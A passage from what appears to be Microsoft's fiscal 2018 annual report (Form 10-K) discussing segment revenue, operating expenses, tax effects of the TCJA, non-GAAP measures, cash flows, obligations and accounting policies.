### Intelligent Cloud

Revenue increased $4.8 billion or 18%.

- Server products and cloud services revenue increased $4.5 billion or 21%, driven by Azure and server products licensed on-premises revenue growth. Azure revenue growth of 91%, due to higher infrastructure-as-a-service and platform-as-a-service consumption-based and per user-based services. Server products licensed on-premises revenue increased 5%, mainly due to a higher mix of premium licenses for Windows Server and Microsoft SQL Server.

- Enterprise Services revenue increased $304 million or 5%, driven by higher revenue from Premier Support Services and Microsoft Consulting Services, offset in part by a decline in revenue from custom support agreements.

Operating income increased $2.4 billion or 26%.

- Gross margin increased $3.1 billion or 16%, driven by growth in server products and cloud services revenue and cloud services scale and efficiencies. Gross margin percentage decreased, due to an increased mix of cloud offerings, offset in part by gross margin percentage improvement in Azure.

- Operating expenses increased $683 million or 7%, driven by investments in commercial sales capacity and cloud engineering.

### More Personal Computing

Revenue increased $3.0 billion or 8%.

- Windows revenue increased $925 million or 5%, driven by growth in Windows Commercial and Windows OEM, offset by a decline in patent licensing revenue. Windows Commercial revenue increased 12%, driven by multi-year agreement revenue growth. Windows OEM revenue increased 5%. Windows OEM Pro revenue grew 11%, ahead of a strengthening commercial PC market. Windows OEM non-Pro revenue declined 4%, below the consumer PC market, driven by continued pressure in the entry-level price category.

- Gaming revenue increased $1.3 billion or 14%, driven by Xbox software and services revenue growth of 20%, mainly from third-party title strength.

- Search advertising revenue increased $793 million or 13%. Search advertising revenue, excluding traffic acquisition costs, increased 16%, driven by growth in Bing, due to higher revenue per search and search volume.

- Surface revenue increased $625 million or 16%, driven by a higher mix of premium devices and an increase in volumes sold, due to the latest editions of Surface.

- Phone revenue decreased $525 million.

Operating income increased $1.8 billion or 20%, including a favorable foreign currency impact of 2%.

- Gross margin increased $2.2 billion or 11%, driven by growth in Windows, Surface, Search, and Gaming. Gross margin percentage increased, primarily due to gross margin percentage improvement in Surface.

- Operating expenses increased $391 million or 3%, driven by investments in Search, artificial intelligence, and Gaming engineering and commercial sales capacity, offset in part by a decrease in Windows marketing expenses.

### Fiscal Year 2017 Compared with Fiscal Year 2016

#### Productivity and Business Processes

Revenue increased $4.1 billion or 16%.

- LinkedIn revenue was $2.3 billion, primarily comprised of revenue from Talent Solutions.

- Office Commercial revenue increased $1.4 billion or 7%, driven by higher revenue from Office 365 commercial, mainly due to growth in subscribers, offset in part by lower revenue from products licensed on-premises, reflecting a continued shift to Office 365 commercial.

- Office Consumer revenue increased $351 million or 11%, driven by higher revenue from Office 365 consumer, mainly due to growth in subscribers.

- Dynamics revenue increased 5%, primarily due to higher revenue from Dynamics 365.

Operating income decreased $367 million or 3%, including an unfavorable foreign currency impact of 2%.

- Operating expenses increased $2.3 billion or 26%, mainly due to LinkedIn and cloud engineering expenses. Operating expenses included $2.3 billion related to our acquisition of LinkedIn, including $359 million of amortization of acquired intangible assets. Sales and marketing expenses increased $1.2 billion or 24%, research and development expenses increased $955 million or 35%, and general and administrative expenses increased $212 million or 14%.

- Gross margin increased $2.0 billion or 9%, primarily due to our acquisition of LinkedIn. Gross margin percentage decreased, due to an increased mix of cloud offerings and amortization of acquired intangible assets related to LinkedIn. Cost of revenue included $918 million related to our acquisition of LinkedIn, including $507 million of amortization of acquired intangible assets.

#### Intelligent Cloud

Revenue increased $2.5 billion or 10%.

- Server products and cloud services revenue grew $2.6 billion or 14%, driven by Azure revenue growth of 98% and server products licensed on-premises revenue growth of 5%.

- Enterprise Services revenue decreased 2%, driven by a decline in revenue from custom support agreements, offset in part by higher revenue from Premier Support Services and Microsoft Consulting Services.

Operating income decreased $122 million or 1%, including an unfavorable foreign currency impact of 2%.

- Operating expenses increased $975 million or 11%, driven by investments in sales capacity, cloud engineering, and developer engagement. Sales and marketing expenses increased $549 million or 13%, research and development expenses increased $468 million or 14%, and general and administrative expenses decreased $42 million or 3%.

- Gross margin increased $853 million or 5%, driven by growth in server products and cloud services revenue and cloud services scale and efficiencies, offset in part by a decline in Enterprise Services gross margin. Gross margin percentage decreased, due to an increased mix of cloud offerings and lower Enterprise Services gross margin percent, offset by improvement in Azure gross margin percent.

*More Personal Computing*

Revenue decreased $1.1 billion or 3%.

- Windows revenue increased $1.0 billion or 6%, mainly due to higher revenue from Windows Commercial and Windows OEM. Windows Commercial revenue grew 14%, driven by multi-year agreement revenue. Windows OEM revenue increased 3%. Windows OEM Pro revenue grew 4%, outperforming the commercial PC market, primarily due to a higher mix of premium licenses sold. Windows OEM non-Pro revenue grew 3%, outperforming the consumer PC market, primarily due to a higher mix of premium devices sold.
- Search advertising revenue increased $791 million or 15%. Search advertising revenue, excluding traffic acquisition costs, increased 9%, primarily driven by growth in Bing, due to higher revenue per search and search volume.
- Gaming revenue decreased slightly, primarily due to lower Xbox hardware revenue, offset in part by higher revenue from Xbox software and services. Xbox hardware revenue decreased 21%, mainly due to lower prices of consoles sold and a decline in volume of consoles sold. Xbox software and services revenue increased 11%, driven by a higher volume of Xbox Live transactions and revenue per transaction.
- Surface revenue decreased $82 million or 2%, primarily due to a reduction in volumes sold, offset in part by a higher mix of premium devices.
- Phone revenue decreased $2.8 billion.

Operating income increased $2.6 billion or 43%, including an unfavorable foreign currency impact of 3%.

- Operating expenses decreased $1.5 billion or 12%, driven by a reduction in Phone expenses and Surface launch-related expenses in the prior year. Sales and marketing expenses decreased $893 million or 16%, research and development expenses decreased $374 million or 6%, and general and administrative expenses decreased $252 million or 16%.
- Gross margin increased $1.1 billion or 6%, driven by growth in Windows, Search advertising, and Gaming, offset in part by a decline in Phone and Surface. Gross margin percentage increased, due to favorable sales mix and gross margin percent improvements across Windows, Gaming, and Search advertising, offset by a gross margin percent decline in Devices.

## Corporate and Other

Corporate and Other operating loss is comprised of corporate-level activity not specifically allocated to a segment, including impairment and restructuring expenses.

### Fiscal Year 2018 Compared with Fiscal Year 2017

Corporate and Other operating loss decreased $306 million, due to a reduction in impairment and restructuring expenses, driven by employee severance expenses primarily related to our sales and marketing restructuring plan in fiscal year 2017.

### Fiscal Year 2017 Compared with Fiscal Year 2016

Corporate and Other operating loss decreased $804 million, primarily due to a reduction in impairment and restructuring expenses, driven by asset impairment charges and restructuring charges related to our Phone business in fiscal year 2016, offset in part by employee severance expenses primarily related to our sales and marketing restructuring plan in fiscal year 2017.

## OPERATING EXPENSES

### Research and Development

| (In millions, except percentages) | 2018 | 2017 | 2016 | Percentage Change 2018 Versus 2017 | Percentage Change 2017 Versus 2016 |
|---|---|---|---|---|---|
| Research and development | $ 14,726 | $ 13,037 | $ 11,988 | 13% | 9% |
| As a percent of revenue | 13% | 13% | 13% | 0ppt | 0ppt |

Research and development expenses include payroll, employee benefits, stock-based compensation expense, and other headcount-related expenses associated with product development. Research and development expenses also include third-party development and programming costs, localization costs incurred to translate software for international markets, and the amortization of purchased software code and services content.

***Fiscal Year 2018 Compared with Fiscal Year 2017***

Research and development expenses increased $1.7 billion or 13%, primarily due to investments in cloud engineering and LinkedIn expenses. LinkedIn expenses increased $762 million to $1.5 billion.

***Fiscal Year 2017 Compared with Fiscal Year 2016***

Research and development expenses increased $1.0 billion or 9%, primarily due to LinkedIn expenses and increased investments in cloud engineering, offset in part by a reduction in Phone expenses. Expenses included $745 million related to our acquisition of LinkedIn.

### Sales and Marketing

| (In millions, except percentages) | 2018 | 2017 | 2016 | Percentage Change 2018 Versus 2017 | Percentage Change 2017 Versus 2016 |
|---|---|---|---|---|---|
| Sales and marketing | $ 17,469 | $ 15,461 | $ 14,635 | 13% | 6% |
| As a percent of revenue | 16% | 16% | 16% | 0ppt | 0ppt |

Sales and marketing expenses include payroll, employee benefits, stock-based compensation expense, and other headcount-related expenses associated with sales and marketing personnel, and the costs of advertising, promotions, trade shows, seminars, and other programs.

***Fiscal Year 2018 Compared with Fiscal Year 2017***

Sales and marketing expenses increased $2.0 billion or 13%, primarily due to LinkedIn expenses and investments in commercial sales capacity, offset in part by a decrease in Windows marketing expenses. LinkedIn expenses increased $1.2 billion to $2.5 billion, including $617 million of amortization of acquired intangible assets.

***Fiscal Year 2017 Compared with Fiscal Year 2016***

Sales and marketing expenses increased $826 million or 6%, primarily due to LinkedIn expenses and increased investments in sales capacity for our commercial cloud, offset in part by a reduction in Phone expenses and prior year marketing expenses primarily related to Surface, commercial, and Windows 10. Expenses included $1.2 billion related to our acquisition of LinkedIn, including $359 million of amortization of acquired intangible assets.

**General and Administrative**

| (In millions, except percentages) | 2018 | 2017 | 2016 | Percentage Change 2018 Versus 2017 | Percentage Change 2017 Versus 2016 |
|---|---|---|---|---|---|
| General and administrative | $ **4,754** | $ 4,481 | $ 4,563 | 6% | (2)% |
| As a percent of revenue | **4%** | 5% | 5% | (1)ppt | 0ppt |

General and administrative expenses include payroll, employee benefits, stock-based compensation expense, severance expense, and other headcount-related expenses associated with finance, legal, facilities, certain human resources and other administrative personnel, certain taxes, and legal and other administrative fees.

### Fiscal Year 2018 Compared with Fiscal Year 2017

General and administrative expenses increased $273 million or 6%, primarily due to LinkedIn expenses. LinkedIn expenses increased $234 million to $528 million.

### Fiscal Year 2017 Compared with Fiscal Year 2016

General and administrative expenses decreased $82 million or 2%, primarily due to prior year investments in infrastructure supporting our business transformation, a reduction in Phone expenses, and lower employee-related expenses, offset in part by LinkedIn expenses. Expenses included $294 million related to our acquisition of LinkedIn.

### IMPAIRMENT AND RESTRUCTURING EXPENSES

Impairment and restructuring expenses include costs associated with the impairment of intangible assets related to our Phone business, and employee severance expenses and other costs associated with the consolidation of facilities and manufacturing operations related to restructuring activities.

### Fiscal Year 2018 Compared with Fiscal Year 2017

During fiscal year 2017, we recorded $306 million of employee severance expenses primarily related to our sales and marketing restructuring plan.

### Fiscal Year 2017 Compared with Fiscal Year 2016

Impairment and restructuring expenses were $306 million for fiscal year 2017, compared to $1.1 billion for fiscal year 2016.

During fiscal year 2016, we recorded $630 million of asset impairment charges related to our Phone business. We also recorded $480 million of restructuring charges, including employee severance expenses and contract termination costs, primarily related to our previously announced Phone business restructuring plans.

<u>OTHER INCOME (EXPENSE), NET</u>

The components of other income (expense), net were as follows:

(In millions)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Dividends and interest income | $ **2,214** | $ 1,387 | $ 903 |
| Interest expense | **(2,733)** | (2,222) | (1,243) |
| Net recognized gains on investments | **2,399** | 2,583 | 668 |
| Net losses on derivatives | **(187)** | (510) | (443) |
| Net losses on foreign currency remeasurements | **(218)** | (111) | (129) |
| Other, net | **(59)** | (251) | (195) |
| Total | $ **1,416** | $ 876 | $ (439) |

We use derivative instruments to: manage risks related to foreign currencies, equity prices, interest rates, and credit; enhance investment returns; and facilitate portfolio diversification. Gains and losses from changes in fair values of derivatives that are not designated as hedges are primarily recognized in other income (expense), net.

### Fiscal Year 2018 Compared with Fiscal Year 2017

Dividends and interest income increased primarily due to higher average portfolio balances and yields on fixed-income securities. Interest expense increased primarily due to higher average outstanding long-term debt and higher finance lease expense. Net recognized gains on investments decreased primarily due to higher losses on sales of fixed-income securities, offset in part by higher gains on sales of equity securities. Net losses on derivatives decreased primarily due to lower losses on equity, foreign exchange, and commodity derivatives, offset in part by losses on interest rate derivatives in the current period as compared to gains in the prior period.

### Fiscal Year 2017 Compared with Fiscal Year 2016

Dividends and interest income increased primarily due to higher portfolio balances and yields on fixed-income securities. Interest expense increased primarily due to higher outstanding long-term debt. Net recognized gains on investments increased primarily due to higher gains on sales of equity securities. Net losses on derivatives increased due to higher losses on equity derivatives, offset in part by lower losses on commodity and foreign currency derivatives. Other, net reflects recognized losses from certain joint ventures and divestitures.

<u>INCOME TAXES</u>

**Effective Tax Rate**

### Fiscal Year 2018 Compared with Fiscal Year 2017

Our effective tax rate for fiscal years 2018 and 2017 was 55% and 15%, respectively. The increase in our effective tax rate for fiscal year 2018 compared to fiscal year 2017 was primarily due to the net charge related to the enactment of the TCJA in fiscal year 2018 and the realization of tax benefits attributable to previous Phone business losses in fiscal year 2017. Our effective tax rate was higher than the U.S. federal statutory rate primarily due to the net charge related to the enactment of the TCJA, offset in part by earnings taxed at lower rates in foreign jurisdictions resulting from our foreign regional operations centers in Ireland, Singapore, and Puerto Rico.

The mix of income before income taxes between the U.S. and foreign countries impacted our effective tax rate as a result of the geographic distribution of, and customer demand for, our products and services. In fiscal year 2018, our U.S. income before income taxes was $11.5 billion and our foreign income before income taxes was $24.9 billion. In

fiscal year 2017, our U.S. income before income taxes was $6.8 billion and our foreign income before income taxes
was $23.1 billion.

### Fiscal Year 2017 Compared with Fiscal Year 2016

Our effective tax rate for fiscal years 2017 and 2016 was 15% and 20%, respectively. The decrease in our effective
tax rate for fiscal year 2017 compared to fiscal year 2016 was primarily due to the realization of tax benefits attributable
to previous Phone business losses, offset in part by changes in the mix of our income before income taxes between
the U.S. and foreign countries. Our effective tax rate was lower than the U.S. federal statutory rate primarily due to
earnings taxed at lower rates in foreign jurisdictions resulting from our foreign regional operations centers in Ireland,
Singapore, and Puerto Rico.

The mix of income before income taxes between the U.S. and foreign countries impacted our effective tax rate as a
result of the geographic distribution of, and customer demand for, our products and services. In fiscal year 2017, our
U.S. income before income taxes was $6.8 billion and our foreign income before income taxes was $23.1 billion. In
fiscal year 2016, our U.S. income before income taxes was $5.1 billion and our foreign income before income taxes
was $20.5 billion.

### Recent Tax Legislation

On December 22, 2017, the TCJA was enacted into law, which significantly changes existing U.S. tax law and includes
numerous provisions that affect our business, such as imposing a one-time transition tax on deemed repatriation of
deferred foreign income, reducing the U.S. federal statutory tax rate, and adopting a territorial tax system. The TCJA
required us to incur a one-time transition tax on deferred foreign income not previously subject to U.S. income tax at a
rate of 15.5% for foreign cash and certain other net current assets, and 8% on the remaining income. The TCJA also
reduced the U.S. federal statutory rate from 35% to 21% effective January 1, 2018. For fiscal year 2018, our blended
U.S. federal statutory tax rate is 28.1%. This is the result of using the tax rate of 35% for the first and second quarter
of fiscal year 2018 and the reduced tax rate of 21% for the third and fourth quarter of fiscal year 2018. The TCJA
includes a provision to tax global intangible low-taxed income ("GILTI") of foreign subsidiaries and a base erosion anti-
abuse tax ("BEAT") measure that taxes certain payments between a U.S. corporation and its foreign subsidiaries. The
GILTI and BEAT provisions of the TCJA will be effective for us beginning July 1, 2018.

The TCJA was effective in the second quarter of fiscal year 2018. As of June 30, 2018, we have not completed our
accounting for the estimated tax effects of the TCJA. During fiscal year 2018, we recorded a provisional net charge of
$13.7 billion related to the TCJA based on reasonable estimates for those tax effects. Due to the timing of the
enactment and the complexity in applying the provisions of the TCJA, the provisional net charge is subject to revisions
as we continue to complete our analysis of the TCJA, collect and prepare necessary data, and interpret any additional
guidance issued by the U.S. Treasury Department, Internal Revenue Service ("IRS"), Financial Accounting Standards
Board, and other standard-setting and regulatory bodies. Adjustments may materially impact our provision for income
taxes and effective tax rate in the period in which the adjustments are made. Our accounting for the estimated tax
effects of the TCJA will be completed during the measurement period, which is not expected to extend beyond one
year from the enactment date.

During fiscal year 2018, we recorded an estimated net charge of $13.7 billion related to the TCJA, due to the impact
of the one-time transition tax on the deemed repatriation of deferred foreign income of $17.9 billion, offset in part by
the impact of changes in the tax rate of $4.2 billion, primarily on deferred tax assets and liabilities.

### Uncertain Tax Positions

While we settled a portion of the IRS audit for tax years 2004 to 2006 during the third quarter of fiscal year 2011, and
a portion of the IRS audit for tax years 2007 to 2009 during the first quarter of fiscal year 2016, we remain under audit
for those years. In the second quarter of fiscal year 2018, we settled a portion of the IRS audit for tax years 2010 to
2013. We continue to be subject to examination by the IRS for tax years 2010 to 2017. In February 2012, the IRS
withdrew its 2011 Revenue Agents Report for tax years 2004 to 2006 and reopened the audit phase of the examination.
As of June 30, 2018, the primary unresolved issue relates to transfer pricing, which could have a significant impact in
our consolidated financial statements if not resolved favorably. We believe our allowances for income tax contingencies
are adequate. We have not received a proposed assessment for the unresolved issues and do not expect a final
resolution of these issues in the next 12 months. Based on the information currently available, we do not anticipate a
significant increase or decrease to our tax contingencies for these issues within the next 12 months.

We are subject to income tax in many jurisdictions outside the U.S. Our operations in certain jurisdictions remain subject to examination for tax years 1996 to 2017, some of which are currently under audit by local tax authorities. The resolution of each of these audits is not expected to be material to our consolidated financial statements.

<u>NON-GAAP FINANCIAL MEASURES</u>

Adjusted operating income, net income and diluted earnings per share are non-GAAP financial measures which exclude the net charge related to the TCJA, and impairment and restructuring expenses. We believe these non-GAAP measures aid investors by providing additional insight into our operational performance and help clarify trends affecting our business. For comparability of reporting, management considers non-GAAP measures in conjunction with GAAP financial results in evaluating business performance. These non-GAAP financial measures presented should not be considered a substitute for, or superior to, the measures of financial performance prepared in accordance with GAAP.

The following table reconciles our financial results reported in accordance with GAAP to non-GAAP financial results:

| (In millions, except percentages and per share amounts) | 2018 | 2017 | 2016 | Percentage Change 2018 Versus 2017 | Percentage Change 2017 Versus 2016 |
|---|---|---|---|---|---|
| Operating income | $ 35,058 | $ 29,025 | $ 26,078 | 21% | 11% |
| Net charge related to the TCJA | 0 | 0 | 0 | | |
| Impairment and restructuring expenses | 0 | 306 | 1,110 | | |
| Adjusted operating income | $ 35,058 | $ 29,331 | $ 27,188 | 20% | 8% |
| Net income | $ 16,571 | $ 25,489 | $ 20,539 | (35)% | 24% |
| Net charge related to the TCJA | 13,696 | 0 | 0 | | |
| Impairment and restructuring expenses | 0 | 243 | 895 | | |
| Adjusted net income | $ 30,267 | $ 25,732 | $ 21,434 | 18% | 20% |
| Diluted earnings per share | $ 2.13 | $ 3.25 | $ 2.56 | (34)% | 27% |
| Net charge related to the TCJA | 1.75 | 0 | 0 | | |
| Impairment and restructuring expenses | 0 | 0.04 | 0.11 | | |
| Adjusted diluted earnings per share | $ 3.88 | $ 3.29 | $ 2.67 | 18% | 23% |

<u>FINANCIAL CONDITION</u>

**Cash, Cash Equivalents, and Investments**

Cash, cash equivalents, and short-term investments totaled $133.8 billion and $133.0 billion as of June 30, 2018 and 2017, respectively. Equity and other investments were $1.9 billion and $6.0 billion as of June 30, 2018 and 2017, respectively. Our short-term investments are primarily intended to facilitate liquidity and capital preservation. They consist predominantly of highly liquid investment-grade fixed-income securities, diversified among industries and individual issuers. The investments are predominantly U.S. dollar-denominated securities, but also include foreign currency-denominated securities to diversify risk. Our fixed-income investments are exposed to interest rate risk and credit risk. The credit risk and average maturity of our fixed-income portfolio are managed to achieve economic returns that correlate to certain fixed-income indices. The settlement risk related to these investments is insignificant given that the short-term investments held are primarily highly liquid investment-grade fixed-income securities.

As a result of the TCJA, our cash, cash equivalents, and short-term investments held by foreign subsidiaries are no longer subject to U.S. tax on repatriation into the U.S.

*Valuation*

In general, and where applicable, we use quoted prices in active markets for identical assets or liabilities to determine the fair value of our financial instruments. This pricing methodology applies to our Level 1 investments, such as U.S. government securities, common and preferred stock, and mutual funds. If quoted prices in active markets for identical assets or liabilities are not available to determine fair value, then we use quoted prices for similar assets and liabilities

or inputs other than the quoted prices that are observable either directly or indirectly. This pricing methodology applies to our Level 2 investments such as corporate notes and bonds, foreign government bonds, mortgage- and asset-backed securities, commercial paper, certificates of deposit, and U.S. agency securities. Level 3 investments are valued using internally developed models with unobservable inputs. Assets and liabilities measured at fair value on a recurring basis using unobservable inputs are an immaterial portion of our portfolio.

A majority of our investments are priced by pricing vendors and are generally Level 1 or Level 2 investments as these vendors either provide a quoted market price in an active market or use observable inputs for their pricing without applying significant adjustments. Broker pricing is used mainly when a quoted price is not available, the investment is not priced by our pricing vendors, or when a broker price is more reflective of fair values in the market in which the investment trades. Our broker-priced investments are generally classified as Level 2 investments because the broker prices these investments based on similar assets without applying significant adjustments. In addition, all our broker-priced investments have a sufficient level of trading volume to demonstrate that the fair values used are appropriate for these investments. Our fair value processes include controls that are designed to ensure appropriate fair values are recorded. These controls include model validation, review of key model inputs, analysis of period-over-period fluctuations, and independent recalculation of prices where appropriate.

## Cash Flows

### *Fiscal Year 2018 Compared with Fiscal Year 2017*

Cash from operations increased $4.4 billion to $43.9 billion for the fiscal year ended June 30, 2018, mainly due to an increase in cash received from customers, offset in part by an increase in cash paid to employees, net cash paid for income taxes, cash paid for interest on debt, and cash paid to suppliers. Cash used in financing was $33.6 billion for the fiscal year ended June 30, 2018, compared to cash from financing of $8.4 billion for the fiscal year ended June 30, 2017. The change was mainly due to a $41.7 billion decrease in proceeds from issuance of debt, net of repayments, offset in part by a $1.1 billion decrease in cash used for common stock repurchases. Cash used in investing decreased $40.7 billion to $6.1 billion for the fiscal year ended June 30, 2018, mainly due to a $25.1 billion decrease in cash used for acquisitions of companies, net of cash acquired, and purchases of intangible and other assets, and a $19.1 billion increase in cash from net investment purchases, sales, and maturities.

### *Fiscal Year 2017 Compared with Fiscal Year 2016*

Cash from operations increased $6.2 billion to $39.5 billion during the fiscal year, mainly due to an increase in cash received from customers and an income tax refund for overpayment of estimated taxes, offset in part by an increase in cash paid to employees. Cash from financing increased $16.8 billion to $8.4 billion, mainly due to a $13.2 billion increase in proceeds from issuances of debt, net of repayments, and a $4.2 billion decrease in cash used for common stock repurchases, offset in part by an $839 million increase in dividends paid. Cash used in investing increased $22.8 billion to $46.8 billion, mainly due to a $24.6 billion increase in cash used for acquisitions of companies, net of cash acquired, and purchases of intangibles and other assets, offset in part by a $1.9 billion decrease in cash used for net investment purchases, sales, and maturities.

## Debt

We issued debt to take advantage of favorable pricing and liquidity in the debt markets, reflecting our credit rating and the low interest rate environment. The proceeds of these issuances were or will be used for general corporate purposes, which may include, among other things, funding for working capital, capital expenditures, repurchases of capital stock, acquisitions, and repayment of existing debt. Refer to Note 12 – Debt of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K) for further discussion.

## Unearned Revenue

Unearned revenue comprises mainly unearned revenue related to volume licensing programs and includes Software Assurance ("SA") and cloud services. Unearned revenue is generally billed upfront at the beginning of each annual coverage period for multi-year agreements and recognized ratably over the coverage period. Unearned revenue also includes payments for other offerings for which we have been paid in advance and earn the revenue when we transfer control of the product or service. Refer to Note 1 – Accounting Policies of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K) for further discussion.

The following table outlines the expected future recognition of unearned revenue as of June 30, 2018:

**(In millions)**

| Three Months Ending, | | |
|---|---|---:|
| September 30, 2018 | $ | 11,081 |
| December 31, 2018 | | 8,688 |
| March 31, 2019 | | 5,995 |
| June 30, 2019 | | 3,141 |
| Thereafter | | 3,815 |
| Total | $ | 32,720 |

If our customers choose to license cloud-based versions of our products and services rather than licensing transaction-based products and services, the associated revenue will shift from being recognized at the time of the transaction to being recognized over the subscription period or upon consumption, as applicable.

### Share Repurchases

For the fiscal years ended June 30, 2018, 2017, and 2016, we repurchased 99 million shares, 170 million shares, and 294 million shares of our common stock for $8.6 billion, $10.3 billion, and $14.8 billion, respectively, through our share repurchase programs. All repurchases were made using cash resources. Refer to Note 18 – Stockholders' Equity of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K) for further discussion.

### Dividends

Refer to Note 18 – Stockholders' Equity of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K) for further discussion.

### Off-Balance Sheet Arrangements

We provide indemnifications of varying scope and size to certain customers against claims of intellectual property infringement made by third parties arising from the use of our products and certain other matters. Additionally, we have agreed to cover damages resulting from breaches of certain security and privacy commitments in our cloud business. In evaluating estimated losses on these obligations, we consider factors such as the degree of probability of an unfavorable outcome and our ability to make a reasonable estimate of the amount of loss. These obligations did not have a material impact in our consolidated financial statements during the periods presented.

## Contractual Obligations

The following table summarizes the payments due by fiscal year for our outstanding contractual obligations as of June 30, 2018:

| (In millions) | 2019 | 2020-2021 | 2022-2023 | Thereafter | Total |
|---|---|---|---|---|---|
| Long-term debt: [a] | | | | | |
|   Principal payments | $ 4,000 | $ 9,268 | $10,794 | $ 52,836 | $ 76,898 |
|   Interest payments | 2,377 | 4,495 | 4,066 | 31,247 | 42,185 |
| Construction commitments [b] | 1,793 | 107 | 0 | 0 | 1,900 |
| Operating leases, including imputed interest [c] | 1,538 | 2,567 | 1,778 | 2,416 | 8,299 |
| Finance leases, including imputed interest [c] | 470 | 1,101 | 1,142 | 5,751 | 8,464 |
| Transition tax [d] | 1,495 | 2,808 | 2,808 | 10,530 | 17,641 |
| Purchase commitments [e] | 19,321 | 874 | 255 | 408 | 20,858 |
| Other long-term liabilities [f] | 0 | 76 | 19 | 313 | 408 |
| Total contractual obligations | $30,994 | $21,296 | $20,862 | $103,501 | $176,653 |

(a)  *Refer to Note 12 – Debt of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K).*
(b)  *Refer to Note 8 – Property and Equipment of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K).*
(c)  *Refer to Note 16 – Leases of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K).*
(d)  *Refer to Note 13 – Income Taxes of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K).*
(e)  *Amounts represent purchase commitments, including open purchase orders and take-or-pay contracts that are not presented as construction commitments above.*
(f)  *We have excluded long-term tax contingencies, other tax liabilities, and deferred income taxes of $13.6 billion from the amounts presented as the timing of these obligations is uncertain. We have also excluded unearned revenue and non-cash items.*

## Other Planned Uses of Capital

We will continue to invest in sales, marketing, product support infrastructure, and existing and advanced areas of technology, as well as continue making acquisitions that align with our business strategy. Additions to property and equipment will continue, including new facilities, datacenters, and computer systems for research and development, sales and marketing, support, and administrative staff. We expect capital expenditures to increase in coming years to support growth in our cloud offerings. We have operating and finance leases for datacenters, corporate offices, research and development facilities, retail stores, and certain equipment. We have not engaged in any related party transactions or arrangements with unconsolidated entities or other persons that are reasonably likely to materially affect liquidity or the availability of capital resources.

## Liquidity

As a result of the TCJA, we are required to pay a one-time transition tax of $17.9 billion on deferred foreign income not previously subject to U.S. income tax. In fiscal year 2018, we paid transition tax of $228 million. Under the TCJA, the remaining transition tax of $17.6 billion is payable interest-free over eight years, with 8% due in each of the first five years, 15% in year six, 20% in year seven, and 25% in year eight.

We expect existing cash, cash equivalents, short-term investments, cash flows from operations, and access to capital markets to continue to be sufficient to fund our operating activities and cash commitments for investing and financing activities, such as dividends, share repurchases, debt maturities, material capital expenditures, and the transition tax related to the TCJA, for at least the next 12 months and thereafter for the foreseeable future.

## RECENT ACCOUNTING GUIDANCE

Refer to Note 1 – Accounting Policies of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K) for further discussion.

## APPLICATION OF CRITICAL ACCOUNTING POLICIES

Our consolidated financial statements and accompanying notes are prepared in accordance with GAAP. Preparing consolidated financial statements requires management to make estimates and assumptions that affect the reported amounts of assets, liabilities, revenue, and expenses. These estimates and assumptions are affected by management's application of accounting policies. Critical accounting policies for us include revenue recognition, impairment of investment securities, goodwill, research and development costs, contingencies, income taxes, and inventories.

### Revenue Recognition

Our contracts with customers often include promises to transfer multiple products and services to a customer. Determining whether products and services are considered distinct performance obligations that should be accounted for separately versus together may require significant judgment. When a cloud-based service includes both on-premises software licenses and cloud services, judgment is required to determine whether the software license is considered distinct and accounted for separately, or not distinct and accounted for together with the cloud service and recognized over time. Certain cloud services, primarily Office 365, depend on a significant level of integration, interdependency, and interrelation between the desktop applications and cloud services, and are accounted for together as one performance obligation. Revenue from Office 365 is recognized ratably over the period in which the cloud services are provided.

Judgment is required to determine the stand-alone selling price ("SSP") for each distinct performance obligation. We use a single amount to estimate SSP for items that are not sold separately, including on-premises licenses sold with SA or software updates provided at no additional charge. We use a range of amounts to estimate SSP when we sell each of the products and services separately and need to determine whether there is a discount to be allocated based on the relative SSP of the various products and services.

In instances where SSP is not directly observable, such as when we do not sell the product or service separately, we determine the SSP using information that may include market conditions and other observable inputs. We typically have more than one SSP for individual products and services due to the stratification of those products and services by customers and circumstances. In these instances, we may use information such as the size of the customer and geographic region in determining the SSP.

Due to the various benefits from and the nature of our SA program, judgment is required to assess the pattern of delivery, including the exercise pattern of certain benefits across our portfolio of customers.

Our products are generally sold with a right of return, we may provide other credits or incentives, and in certain instances we estimate customer usage of our products and services, which are accounted for as variable consideration when determining the amount of revenue to recognize. Returns and credits are estimated at contract inception and updated at the end of each reporting period if additional information becomes available. Changes to our estimated variable consideration were not material for the periods presented.

The new standard related to revenue recognition had a material impact in our consolidated financial statements. Refer to Note 1 – Accounting Policies of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K) for further discussion.

### Impairment of Investment Securities

We review investments quarterly for indicators of other-than-temporary impairment. This determination requires significant judgment. In making this judgment, we employ a systematic methodology quarterly that considers available quantitative and qualitative evidence in evaluating potential impairment of our investments. If the cost of an investment exceeds its fair value, we evaluate, among other factors, general market conditions, credit quality of debt instrument issuers, the duration and extent to which the fair value is less than cost, and for equity securities, our intent and ability to hold, or plans to sell, the investment. For fixed-income securities, we also evaluate whether we have plans to sell the security or it is more likely than not that we will be required to sell the security before recovery. We also consider

45

specific adverse conditions related to the financial health of and business outlook for the investee, including industry and sector performance, changes in technology, and operational and financing cash flow factors. Once a decline in fair value is determined to be other-than-temporary, an impairment charge is recorded to other income (expense), net and a new cost basis in the investment is established. If market, industry, and/or investee conditions deteriorate, we may incur future impairments.

### Goodwill

We allocate goodwill to reporting units based on the reporting unit expected to benefit from the business combination. We evaluate our reporting units on an annual basis and, if necessary, reassign goodwill using a relative fair value allocation approach. Goodwill is tested for impairment at the reporting unit level (operating segment or one level below an operating segment) on an annual basis (May 1 for us) and between annual tests if an event occurs or circumstances change that would more likely than not reduce the fair value of a reporting unit below its carrying value. These events or circumstances could include a significant change in the business climate, legal factors, operating performance indicators, competition, or sale or disposition of a significant portion of a reporting unit.

Application of the goodwill impairment test requires judgment, including the identification of reporting units, assignment of assets and liabilities to reporting units, assignment of goodwill to reporting units, and determination of the fair value of each reporting unit. The fair value of each reporting unit is estimated primarily through the use of a discounted cash flow methodology. This analysis requires significant judgments, including estimation of future cash flows, which is dependent on internal forecasts, estimation of the long-term rate of growth for our business, estimation of the useful life over which cash flows will occur, and determination of our weighted average cost of capital.

